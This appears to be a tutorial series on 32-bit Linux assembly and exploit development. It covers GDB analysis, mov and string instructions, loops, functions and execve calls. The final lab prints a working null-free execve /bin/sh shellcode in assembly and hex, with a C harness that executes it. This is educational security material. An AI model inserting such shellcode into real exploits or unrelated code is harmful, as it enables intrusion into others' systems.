
Malware Analysis and Exploit Development Security Professionals

Uploaded by

Mesara Al-anani

Prepared by @ALPARSLAN AKYILDIZ

LINUX ASSEMBLY AND EXPLOIT DEVELOPMENT
ARTICLE SERIES PART 3
• GDB USAGE
• EXECVE CUSTOM SHELLCODE CREATION
• CREATING FUNCTIONS
• STRING OPERATIONS
• LOOPS

Contents

LAB 4: Data Types in Assembly Programming
LAB 5: Assembly Variable Assignment And Moving Operations
LAB 6: Assembly Character Operations
LAB 7: Assembly JMP Command, LOOP Creation And EXECVE
LAB 8: Creating a Linux Assembly Function
LAB 9: Shellcode with EXECVE

LAB 4: Data Types in Assembly Programming

One of the points that must be known when writing a program in assembly is the size of the data. The .byte directive reserves a 1-byte field for each value. The .ascii directive defines a character string, .asciz a null-terminated character string, .int a 32-bit integer, .short a 16-bit integer, and .float a single-precision floating-point number. Common memory areas are reserved with .comm, and local memory areas with .lcomm. For a better understanding of the subject, a simple assembly program is written as follows and analyzed with GDB.
In the code, the string “assembly hacker” is stored in the variable string, the value 32 in the variable integer, the elements 1, 2, 3, 4, 5 in the variable array, the value 12 in the variable short, and the value 11 in the variable byte. A field of 2000 bytes, which is not initialized, is reserved in the common memory area.

Since the code will be analyzed with GDB, the --gstabs parameter is used while it is being assembled into an object file.

The program is linked as follows

While analyzing with the tool GDB, the following steps are examined:

After a breakpoint has been placed at line 28 of the code and the program has been started with the run command, the starting addresses of the data held in the variables are displayed with the info variables command. The starting address of the “assembly hacker” string is the address listed next to the string variable. With the x (examine) command, the data at these addresses can be displayed as shown below:

As can be seen in the screenshot, the memory regions pointed to by the addresses hold the values of the variables that were created.

LAB 5: Assembly Variable Assignment And Moving Operations

In order to read and understand assembly code, the syntax and rules of the move operations must be known. 32-bit data is moved with the movl instruction, 16-bit data with movw, and 1-byte (8-bit) data with movb. Data can be moved from one register to another. For example, the instruction movl %eax, %ecx copies the value in eax into ecx. The point to be considered while moving data is that the source and destination must be the same size. In addition, data can be moved from a memory region to a register and vice versa.

Let's examine the representative code below:

variable_place:

.int 20

movl $variable_place, %eax: The address of the location holding the value 20 is placed in eax.

In that case, (%eax) refers to the value 20, while %eax itself holds the address. Immediate values (data such as constant numbers) can be copied directly into a register. For example, the following code puts the value 20 into the eax register:

movl $20, %eax

The value of the variable in a memory region can be changed as follows:

memory_place:

.byte 10

movb $20, memory_place: While the memory address holds the value 10, the value 20 is written to the location indicated by this address. The form base_address(offset_address, index, size) is used to address an element of an array; offset_address and index must be registers. A sample move is shown below:

array:

.int 10, 20, 30, 40, 50

movl $2, %edi

movl %eax, array(,%edi,4): The value in eax is written in place of 30.

Important Rules for AT&T Syntax:

• When the “$” sign comes before a label name, the memory address of the variable is taken. For example, when variable_place is written without the sign, the value stored at the address is used. If $variable_place is used, the address of the variable is used.

• (%edi) refers to the value stored at the address held in the edi register. If the location whose address is in edi holds the value 9, the instruction movl $11, (%edi) overwrites that 9 with 11.

• The instruction movl $4, 9(%edi) adds 9 to the address held in edi and places the number 4 in the resulting memory location (EDI + 9).

• Likewise, -2(%edi) refers to the memory location at the address (EDI - 2).

For a better understanding of the subject, additional code is added to the program written in LAB 4 and analyzed with GDB. The following code is added to the _start: section of the LAB 4 program:

After the program written above has been assembled and linked, it is analyzed with the GDB as
follows.

The program is assembled and linked using the commands below:

as --gstabs program.s -o program.o

ld program.o -o program

The analysis starts with the command gdb ./program. The breakpoint is set at _start. In this way, the program flow can be monitored.

When the program, on which the breakpoint has been set, is started with the run command, the addresses of the variables in memory and the current values of the registers are shown in the output as above. When the next instruction is executed with the s command, the value 20 is put into the eax register as shown below:

When the memory region is examined, it is seen that the variable integer first holds its initially assigned value and that the value 6 is written over it after the instruction has executed.

The print and x (examine) commands are easily confused with each other. The following experiment clears up this confusion:

The print command prints the value in eax, whereas the x command prints the data stored in the memory area whose address is the value in eax. GDB printed an error because the value 20 is not an accessible memory address.

As can be seen, the value 11 in the memory area labeled byte is assigned to the eax register. In the next instruction, the value 2 is assigned to al, and this value is then written over the value 11 in the memory region labeled byte, as shown below:

The address of the byte variable is shown above with &byte. The value 2 has been assigned to the variable byte. In the code line movl $byte, %edi, the address of the variable byte is put into the edi register.

The value in the edi register is now the address of the variable byte. When the location pointed to by edi is examined with the x command, the value 2 is seen. When the value held in $edi is displayed with the print command, the address of the variable byte is printed in decimal, as shown below:

After this step, the value 12 is written into the memory region pointed to by (%edi). The previous value, 2, is replaced by 12 as follows:

In the last step, a value in the array is changed as follows:

The value 13 is assigned in place of the value 3. The application above exemplifies the assignments made with the mov instruction in 32-bit Linux assembly.

LAB 6: Assembly Character Operations

In this example application, string operations are shown and analyzed with GDB. In the first step, the sample program is written. In the program, ESI points to the source string and EDI to the destination. As will be remembered from the first chapter, the esi register is used for reading and the edi register for writing. The sample program is shown below:

The program will be analyzed with GDB by setting a breakpoint at _start. After the variables are defined in .data and .bss, the operations performed in _start are explained step by step as follows:

As can be read from the comment lines in the program, the $ sign is put in front of the variable names so that their addresses are loaded into esi and edi. Then 1 byte of data is copied from the source to the destination with the movsb instruction, 16 bits with the movsw instruction, and 32 bits with the movsl instruction. The GDB analysis of the procedure described so far is carried out as follows:

The variables are displayed and their addresses are printed on the screen. As seen, the esi and edi registers are still empty. The first instruction to run is nop. When the program flow continues after this instruction, the starting address of the string1 characters in memory is written into esi, and the starting address of the string2 characters into edi. In the last step, the copying is done with the movs instructions:

When the movs instructions are executed, the string1 characters are copied into string2 as follows:

First 1 byte, then 16 bits (2 bytes), and then 32 bits (4 bytes) of data are copied into string2. The edi value changes with each copy operation: after each copy, edi points just past the last byte written. The output below shows the final value of the edi register:

DF (the direction flag) decides whether the esi and edi values are increased or decreased after each movs instruction. GDB shows only the flags that are set. For example, the output below shows that only IF (the interrupt flag) is set during the program flow:

The rep prefix repeats a string instruction as long as the ecx value is greater than 0, decreasing ecx by 1 after each repetition. In the first block of code, the esi and edi values were increased automatically with every movs operation. Therefore, after the first byte is copied, the next copy continues from the address reached in the previous operation. If DF has been set (with the std instruction) for the operations with rep, it is cleared again with the cld instruction after the operation.

The GDB analysis of the subsequent instructions is shown below:

With the LODSx instructions, data is loaded into the eax register. The source address is held in the esi register. lodsb moves 8-bit data from memory into the al register, lodsw moves 16-bit data into the ax register, and lodsl moves 32-bit data into the eax register. With the leal (load effective address) instruction, the address of the string1 variable is written directly into the esi register. The lodsb instruction then loads the first byte (8 bits) of string1, starting from the address held in esi. Afterwards, 0 is put into al and the esi value is reduced by 1. The reason for this reduction is that the esi value increased by 1 after the load, and the code writer wants esi to return to its previous value. Next, 16-bit data is loaded from the address in esi with the lodsw instruction, and 32-bit data with the lodsl instruction. With the sub instruction, the esi register value is reduced again and returned to its previous value.

leal var2, %edi

stosb

stosw

In the code above, the address of var2 is loaded into edi, and the stos instruction then stores the relevant value at the memory location pointed to by edi: stosb stores the value in al, stosw the value in ax, and stosl the value in eax.

In the last piece of the code, the first bytes of the two character strings pointed to by esi and edi are compared with the cmpsb instruction. The comparison is performed as a subtraction. If the result is zero, the compared data are the same, and ZF (the zero flag) is set to 1.

LAB 7: Assembly JMP Command, LOOP Creation And EXECVE

The JMP instruction works like the goto statement in the C programming language. In other words, it names the place to go, and the program flow continues from there. Both conditional and unconditional jumps can be used within a program. The working logic of JMP is examined in the program written below:

When the program is examined, it is seen that the global and initialized variables are defined in the .data segment. In _start, the character string starting at the address of the message variable is printed on the screen. With the JMP instruction, the exit code is skipped and execution jumps to the execve label. First, a prologue is performed in execve and an 8-byte area is reserved on the stack with the SUB instruction, because two 4-byte values must be put on the stack. The equivalent of the execve program in the C programming language is as follows:

char *data[2];

data[0] = "/bin/sh";

data[1] = NULL;

execve(data[0], data, NULL);

In the function, the values "/bin/sh" and NULL (i.e. 0) must be passed through the array. Therefore, an 8-byte space is opened on the stack. The system call number for execve is listed as 11 in the system call table:

11. sys_execve

Syntax: int sys_execve(struct pt_regs regs)

Source: arch/i386/kernel/process.c

Action: execute program

After the address of the string "/bin/sh" in the variable file_to_run is loaded into the edi register, this value is placed 8 bytes below the address held in EBP. The value 0 is placed 4 bytes below the address held in EBP. After 11 is assigned to eax as the system call number, the starting address of the “/bin/sh” characters in memory is put into ebx, and the address of the argument array is loaded into ecx. The program was assembled, linked, and run as below:

The gdb analysis of the program is carried out as follows for a better understanding of the subject. Any function can be disassembled using the disassemble command. Below, execve has been disassembled. The registers and variables are examined while stepping from _start, which is set as the breakpoint.

In the first steps, the message is printed on the screen. When the jmp instruction is about to run, the eip state is examined as follows. When jmp is executed, the memory address of its target is loaded into eip, and the program flow continues at the execve label. Because of the jump, the exit code is skipped and never runs.

When execve starts, the variable addresses are placed in the registers as below, and the string address and the value 0 are written to the relevant places on the stack for the execve call to work. As can be seen in the analysis, after the address of the file_to_run variable is put into edi, this address is stored in the memory location at ebp-8. Then the value 0 is stored in the memory location at ebp-4. To call execve, the system call number 11 is placed in eax, the address of /bin/sh in ebx, and the address of the argument array in ecx; the program then gives a shell as follows:

The call instruction is used to call functions. The ret instruction takes the return address of the function from the stack and loads it into eip, so the program flow continues from where it left off. The ret instruction is similar to the return statement in the C programming language. Every function entered with call must end by running ret. When call is executed, the address of the instruction that follows the call is pushed onto the stack so that the program flow can continue after the called function has finished and returned to the main program. After the function has finished, ret pops this address from the stack into eip, and the program flow continues. In order to demonstrate the use of call, a program produced by a small change to the previous program is analyzed with gdb as shown below:

The code written was examined on the gdb as follows:

The eip shows the address of the instruction to run next. The values on the stack are checked as above. After the call instruction runs, the program flow is directed into sayyou. When the stack is checked after this point, it is seen that the address 0x0804890 has been pushed onto the stack. As explained in the theoretical section, the address of the nop instruction that follows the line where the function is called is pushed onto the stack as the return address, so that the program flow can continue after the function has completed. In the output below, the address of the nop instruction is shown by the disassembler:

The loop instruction decreases the value of the ecx register by 1 each time the loop turns and jumps back as long as ecx is not zero. The jz instruction jumps if the zero flag is set. The jnz instruction jumps if the zero flag is not set. Similarly, loopz keeps looping as long as the zero flag is set, and loopnz as long as the zero flag is not set (in both cases only while ecx is not zero). The use of the loop instruction was shown in the example above. Its format is as follows:

Command set

movl $20, %ecx

lupla:

Command set

loop lupla

The loop turns 20 times because 20 is loaded into ecx in the above format. In the program shown below, the character string defined in the data section is printed on the screen 12 times. The change of the value in the ecx register is shown with gdb as follows. The program output is as shown:

Program codes:

For the analysis with gdb, a breakpoint has been placed at the pushl %ecx instruction. Each time the loop turns, the ecx value is reduced by 1.

As can be seen in the output, the ecx value is decreased by 1 each time the loop turns.

LAB 8: Creating a Linux Assembly Function

In this lab, creating a function in Linux assembly is covered. The syntax is shown below:

.type function_name, @function

function_name:

Command set

ret

The written function is called with the command call. Based on the above structure, the sample
function code is written as follows:

.data

warning:

.asciz "Attack detected execve coming"

file_to_run:

.asciz "/bin/sh"

.text

.global _start

_start:

.type shell, @function

.type print, @function

print:

movl $4, %eax

movl $1, %ebx

movl $30, %edx

leal warning, %ecx

int $0x80

call shell

shell:

pushl %ebp

movl %esp, %ebp

subl $0x8, %esp # array of two pointers: array[0] = file_to_run, array[1] = 0

movl $file_to_run, %edi

movl %edi, -0x8(%ebp)

movl $0, -0x4(%ebp)

movl $11, %eax # sys_execve

movl $file_to_run, %ebx # file to execute

leal -8(%ebp), %ecx # command line parameters

movl $0, %edx # environment block

int $0x80

leave

ret

call print

LAB 9: Shellcode with EXECVE

In the previous labs, execve was used. In this lab, execve will be written using the assembly and C programming languages. The code will be converted into machine code with the objdump tool, and the shellcode will be obtained. In the exploitation process, the code injected into memory must be directly executable by the processor. For this reason, the code must be placed in memory already converted into machine code, and this is what shellcode is. Shellcode is a piece of machine code, usually written as hex bytes, that is used to run commands in a shell on the target. The execve prototype is displayed as follows with man execve.

Based on the prototype on the manual page, the code is written as follows:

The array args is a pointer array with two elements that holds the memory addresses of other arrays. The first element is /bin/sh, the file that allows commands to be run on Linux operating systems. args[1] is NULL because the argument array must be terminated by a NULL pointer. The program is written according to the prototype by passing the file (/bin/sh), the address of the array, and NULL to execve. The program was compiled with gcc using the following command:

gcc -ggdb shell.c -mpreferred-stack-boundary=2 -static -o shell.exe

The parameter -mpreferred-stack-boundary=2 keeps the stack aligned to a 2^2 = 4-byte boundary instead of the default 2^4 = 16-byte boundary.

With the -static parameter, the libraries are linked statically, so the program does not depend on shared libraries at run time.

When the written code is disassembled with the gdb, the main function is broken down as follows:

Looking at the disassembled code, it is seen that the code starts with the prologue. A 20-byte (0x14 = 16 + 4 = 20) space is allocated on the stack. The address of the character string "/bin/sh" is placed 8 bytes below the address held in ebp. In the output above, the x command shows that this address points to the /bin/sh character string. The value 0 is placed 4 bytes below the EBP address. The address stored at ebp-8 is loaded into eax, so eax now points to the character string "/bin/sh". The value 0 is placed at the address ESP + 8. The address ebp-8 itself is loaded into edx, and the value in edx is placed at the address esp + 4. After the value in eax is placed at the address held in esp, the execve function is called. From this point on, execve starts the shell using the "/bin/sh" character string, the array address, and the value 0.

The code written in the C programming language was disassembled, which gave an idea of its working mechanism. The same code was written in assembly in the previous lab. The sample code was as follows:

11. sys_execve

Syntax: int sys_execve(struct pt_regs regs)

Source: arch/i386/kernel/process.c

Action: execute program

Below, the objdump command displays the machine code equivalent of the code, from which a shellcode is created:

In the output above, 00 bytes are seen. A \x00 byte, being the NULL character, stops the shellcode from being placed completely in memory, typically because string-copy functions treat it as the end of the string. In addition, characters such as line feed (\x0a) and carriage return (\x0d) can prevent the shellcode from working, since input routines may treat them as the end of a line. These characters need to be cleared from the shellcode. Automatically clearing bad characters will be shown in the following topics. Instead of the mov instructions that generate the null bytes, instructions such as push and jmp are used to remove the NULL characters. Below is the sample shellcode (Source: http://shell-storm.org/shellcode/files/shellcode-827.php):

Assembly code:

xor %eax,%eax

push %eax

push $0x68732f2f

push $0x6e69622f

mov %esp,%ebx

push %eax

push %ebx

mov %esp,%ecx

mov $0xb,%al

int $0x80

ShellCode C

#include <stdio.h>

#include <string.h>

char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"

"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(void)

{

fprintf(stdout, "Length: %zu\n", strlen(shellcode));

(*(void(*)()) shellcode)();

return 0;

}
